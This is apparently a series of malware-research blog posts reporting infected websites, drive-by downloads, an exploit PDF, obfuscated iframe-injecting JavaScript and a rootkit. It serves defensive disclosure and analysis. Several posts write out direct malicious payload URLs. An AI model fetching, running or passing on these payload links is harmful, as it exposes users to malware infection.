Malware in a rar
The following site (Russian language), igra.newvksoft.org.ua, downloads a rar file onto your computer.
If you extract the file you will get this:
file.exe is malware
It’s not often I see malware coming through a rar file.
Did you know? The rar file compression format was developed by a Russian software engineer, Eugene Roshal.
It probably is just a coincidence that this file also targets Russian users.
Jerome
Malware ID: 8a0a4749ddd176c08f4c58d8a52a866c.zip
Warning: all links contained in this post may infect your computer!
|
miekiemoes has a secret admirer
The following Czech site (otylkaaotesanek.cz ) contains an exploit:
In Google Chrome you will see a PDF automatically downloaded (thankfully I did not have Adobe reader installed on this machine)
The malware author took the time to credit this PDF to security researcher miekiemoes. That sounds pretty similar to a Dancho Danchev fan club

This is a malicious PDF:
Only one AV vendor from Virus Total (Sophos) detected this threat:
Opening the PDF with a vulnerable version of Adobe Reader will launch the following payload:
dom2cn.cn/13b/load.php?spl=pdf_exp
jzion.cn/etc242342534252435223/1.php
jzion.cn/etc242342534252435223/soft14.exe
The last file is a Trojan detected by 35% of the AV vendors from Virus Total, at the time of writing.
Jerome Segura
Malware ID: t1L8XD644LtNd.pdf.zip
Warning: all links contained in this post may infect your computer!
|
Ambassadors for education’s site compromised
globalfundforeducation.org has been compromised.
Obfuscated JavaScript:
A little bit of fiddling around with the JS code allows us to display what it actually does:
An iframe:

Which is also referenced in the main code:
The final payload seemed to come from soft-siski.com in the form of several executables.
Jerome Segura
Warning: all links contained in this post may infect your computer!
|
Site ‘Under construction’ hosts malware
Our Honeypots caught the following site: dataprovedor.com.
Is this site really under construction? It looks like some kind of web portal.
Regardless, let’s get to the subject that got us here in the first place: The malware.
In a sub directory called images you can see two files, one is an exe, the other a php which redirects to the exe.
I found it rather smart that the file name for the exe is in the form of DSCXXXXX. For those who own a Sony camera (or possibly other Sony products) this is the default name to which images are saved to.
So, one bonus point for the social engineering trick.
The time stamp also indicates that those files have been uploaded recently, to what I think is a hacked server.
The online file checker Jotti reveals that the file may be part of the Banload Trojans family, but is poorly detected at the time of writing:
Jerome Segura
Malware ID: 2b65626b2442521307d68a53c0b5e6aa.zip
|
Spy on your wife, get infected
Our HoneyPots caught this site spymycomputer.com and one of its products “spy man”
I decided to take a closer look:
First, as reported by our HoneyPots, the site initiates two drive-bys:
The drive-by files are not very well detected yet, as shows this Virus Total scan:
The source code of spymycomputer.com contains 3 iframes:
frantsuz.com was listed by Google: http://google.com/safebrowsing/diagnostic?site=frantsuz.com/
abbcp.cn is already blacklisted by our friend Steven Burn over at hpHosts:
As far as the software itself, “Spy Man” you may want to think about it twice before installing it:
Key logging programs have always had a bad reputation… Well, the name itself “Spy Man” sounds a little bit like a Cold War espion character
Jerome Segura
Malware ID: 8cbe7e2692a5bdaabfc6b2253c7624e7.zip
Malware ID: f00173d0a26085d3333578f2d90e5c64.zip
|
‘Welcome to Bulgaria’ site infected…
Our HoneyPots caught this site as being malicious: legal.bg
They also gave us the drive-by download:
git77.biz/myy/dateoiou1.exe
But I wanted to know more on how this happened…
The Bulgarian site contains obfuscated Javascript:
And a particular long piece of unicode with a lot of ‘V’s in it:
the new variable uses the “split” function to clear the ‘V’s out of the way.
Another variable is setup as a string:
Then a ‘for loop’ function will go through each single character from the long variable without the ‘V’s:
Finally the document.write method will add the final piece to the puzzle, which is an iframe, but making sure it is obfuscated. The obfuscation part is defined in the long piece of unicode as “opacity=0″ (more on that later)
So, how did we deobfuscate this?
Well, we commented out the blue code above… and used our own document.write
It basically takes the variable containing the iframe and writes it with a space between each character. That way, we can print it without it being hidden by the opacity argument. This is what it looks like, in clear text
So what about those iframes that are 0 in width and in height? Too easy to detect… Yes, probably. This one is “in your face” (width=”480″ height=”60″) and yet totally invisible.
The final payload is an executable detected on VirusTotal as:
Thanks to Newaz Rafiq for his help on the deobfuscation part.
Jerome Segura
Malware ID: 4e1741d0a991ada20b9a788f2074f0ba.zip
Updated to add: This seems to be using the Fragus exploit kit. More info here from MalwareDomainList. (Thanks to MalwareScene)
|
Spa site gets `rootkited`
I came across this spa’s website today, which is hosting a rootkit.
The full URL is: www.landmarkspa.com/pdf/wq.exe
The file itself came up as clean as soap on VirusTotal:
Upon running it though, the file immediately deleted itself and created a Service.
That service, or rootkit, is detected by a few AV Vendors:
Playing with the new (free) version of McAfee FileInsight:
The screenshot below shows the rootkit name and… a lot of padding… an easy way to bypass signature detection.
Jerome Segura
Malware ID: f535708ce6190267e16ee8e22d5d4917.zip
|
Imageshack.us typo pushes malware
lmageshack.us (an ‘L’ in place of an ‘i’):
redirects you to a compromised site hosting malware:
the exact path is: www.powerpress.ch/images/img327.scr
VirusTotal analysis:
Jerome Segura
Malware ID: e766415f02909b548f64071fe904bcb6.zip
|
Angelina and Zango cash
I came across the following site today: angelinajmovies.cn
If you browse the site you immediately get a file:
which VirusTotal detects as:
If you refresh the page you now get this second file (sorry I used Firefox here, but you get the same result in IE):
which VirusTotal detects as:
And if you refresh the page angelinajmovies.cn for a third time you get:
Wait, let’s zoom in a little bit:
Yes, you see it right, Zango it is.
Dreamcatcher player, sorry DreamMediaPlayer or whatever.
The landing page reminds me so much of the fake codec pages. I bet they might even have used the same template.
Bad on all fronts!
Jerome Segura
Malware ID: 67e252ee84a6b5d0e2706ccc3e36a106.zip
Malware ID: bea4676cddd48770b56c54db8b07f370.zip
Malware ID: c115d8251fe12d92567e55cad1d379e9.zip
|
French site serves malware
I noticed a French site hit our traps… As a Frenchman I thought I’d check.
agencedelamairie.fr is hosting malware (agencedelamairie.fr/images/bouton/Explorer8.exe)
It is a realtor site.. although not very functional at the moment.
The file detection on Virus Total:
The site’s owner has been contacted.
Jerome Segura
Malware ID: d481046cb2f05e656100556fabbaf4e7.zip
|










































